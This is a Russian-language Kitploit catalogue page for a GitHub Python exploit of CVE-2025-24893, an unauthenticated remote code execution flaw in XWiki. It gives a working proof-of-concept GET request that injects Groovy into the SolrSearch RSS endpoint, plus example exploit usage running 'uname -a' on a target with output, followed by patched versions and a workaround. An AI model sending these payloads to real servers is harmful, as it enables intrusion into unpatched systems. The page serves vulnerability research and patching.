Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893 — Python-эксплойт для CVE-2025-24893, критическая неаутентифицированная RCE в XWiki Platform, позволяющая выполнение произвольного кода Groovy через специально созданный RSS-запрос к конечной точке SolrSearch. | Kitploit
Инструменты/GitHubGitHub/b0ysie7e/cve-2025-24893
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

Python-эксплойт для CVE-2025-24893, критическая неаутентифицированная RCE в XWiki Platform, позволяющая выполнение произвольного кода Groovy через специально созданный RSS-запрос к конечной точке SolrSearch.

Репозиторий
1131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для CVE-2025-24893

CVE-2025-24893 — это критическая уязвимость удаленного выполнения кода (RCE) без аутентификации, затрагивающая XWiki Platform.
Эта ошибка позволяет любому гостевому пользователю внедрять и выполнять произвольный Groovy-код без аутентификации через специально сформированный RSS-запрос к конечной точке SolrSearch.

Это напрямую влияет на конфиденциальность, целостность и доступность уязвимой системы.

Краткая информация

  • Затронутые версии:
    • XWiki ≥ 5.3-milestone-2 до < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 до < 16.4.1
  • Оценка CVSS v3.1: 9.8 (Критический)
    Вектор: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Эксплуатируемость: Очень просто — достаточно одного HTTP GET-запроса.

⚠️ Отказ от ответственности:

Данный код предназначен строго для образовательных и исследовательских целей. Несанкционированное использование в системах без явного разрешения может быть нарушением закона. Автор не несет ответственности за неправомерное использование или вредоносную деятельность, связанную с этим инструментом.

Подтверждение концепции (Proof-of-Concept, POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

Инструкция по использованию скрипта эксплойта

В этом разделе объясняется, как настроить и запустить Python-скрипт эксплойта для использования CVE-2025-24893.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

Смягчение последствий

Обновление до исправленных версий:

Для устранения уязвимости обновите XWiki до одной из следующих версий:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

Временное решение:

Если обновление невозможно немедленно, примените временную меру:

  1. Отредактируйте файл SolrSearchMacros.xml (находится в Main.SolrSearchMacros) примерно на строке 955.
  2. Замените логику вывода на использование макроса rawResponse с установленным типом содержимого application/xml.
    В качестве образца используйте реализацию из macros.vm на строке 2824.

Ссылки:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
Скачать инструмент